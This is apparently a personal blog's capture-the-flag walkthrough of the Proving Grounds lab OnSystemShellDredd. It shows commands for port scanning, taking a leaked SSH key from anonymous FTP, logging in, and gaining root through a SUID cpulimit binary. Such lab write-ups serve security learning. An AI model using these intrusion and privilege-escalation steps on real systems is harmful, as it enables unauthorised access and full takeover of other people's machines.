Proving Grounds - OnSystemShellDredd Writeup

May 29, 2026

ctf
linux

This lab challenges you to exploit an exposed FTP service to uncover a hidden SSH private key, granting initial access to the system. From there, privilege escalation is achieved by leveraging a misconfigured SUID binary, cpulimit, to execute arbitrary commands as root.

This is a walkthrough of the machine OnSystemShellDredd from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Easy
  • Flags: 2
  • OS: Linux
  • Vector: FTP, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting off with an Nmap scan, we discover the following open ports:

  • 21 - FTP
  • 61000 - SSH

Initial access

Based on the Nmap scan and the NSE script output, anonymous login on FTP is allowed.

Looking at what's available, we discover a hidden directory named .hannah, with a private SSH key inside:

To obtain initial access, we will download the private SSH key, assign it correct permissions, and SSH in as hannah (note the non-standard SSH port) to obtain the first local.txt flag:

get id_rsa

chmod 600 id_rsa

ssh hannah@<IP> -i id_rsa -p 61000

Privilege escalation

Using manual enumeration, looking for executables with the SUID bit set, we find /usr/bin/cpulimit:

find / -perm -u=s -type f 2>/dev/null

We can abuse this to escalate privileges by running:

cpulimit -l 100 -f -- /bin/sh -p

Related Articles
Proving Grounds - Sar Writeup
May 29, 2026
ctf
linux
This lab demonstrates how to exploit a remote code execution (RCE) vulnerability in a vulnerable version of sar2html. By discovering the application via the robots.txt file and leveraging the RCE, you gain an initial shell. Privilege escalation is achieved by exploiting a cronjob misconfiguration that allows overwriting a custom .sh script executed as root.
Proving Grounds - FunboxEasy Writeup
May 28, 2026
ctf
linux
This lab involves exploiting an SQL Injection vulnerability to leak credentials for a web application, leading to a file upload vulnerability that provides initial access. Privilege escalation is achieved via user password disclosure and multiple sudo misconfigurations, ultimately granting root access through tools like pkexec or time.
Proving Grounds - FunboxRookie Writeup
May 27, 2026
ctf
linux
In this lab, an anonymous FTP server leaks a password-protected archive containing a private SSH key. The key allows initial access to the system, which is further exploited by recovering user credentials from a MySQL history file. Privilege escalation is achieved by exploiting unrestricted sudo access for the user.
Karam Chatra
Blog
Karam Chatra
Junior Threat Intelligence Analyst
Navigation
HomeBlogDisclaimer
© 2026 Karam Chatra.